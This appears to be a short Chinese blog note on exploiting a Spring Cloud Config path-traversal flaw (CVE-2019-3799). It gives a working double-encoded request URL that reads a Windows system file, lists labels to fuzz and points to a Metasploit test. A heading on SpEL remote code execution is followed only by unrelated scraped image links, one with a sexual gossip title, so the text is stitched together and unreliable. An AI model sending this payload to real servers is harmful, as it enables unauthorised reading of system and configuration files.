1.spring cloud config 跨目录文件读取(CVE-2019-3799):
参考:
测试环境下载:https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE
根据官方文档,可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件,name,profile和label的含义与常规环境下的endpoint相同,而path是指文件名。
http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini
如果label不存在则会提示如下:
>No such label: env
或者:
Cannot load environment
fuzz出来lable:
test、master、head等
MSF测试:
参考https://www.xd10086.com/posts/1808713361549490810/
2、远程代码执行SpEL RCE
![[记录] 2024观安杯部分writeup-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2024/11/429e3b2028f8b9283937c25c1f696b85.png)
![[音乐] 何天慈--《复活》192k/mp3-微慑信息网-VulSee.com](http://www.fitbbs.com/attachmentat/Mon_0702/45_10281_6ffbdf5f5272d6e.jpg)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
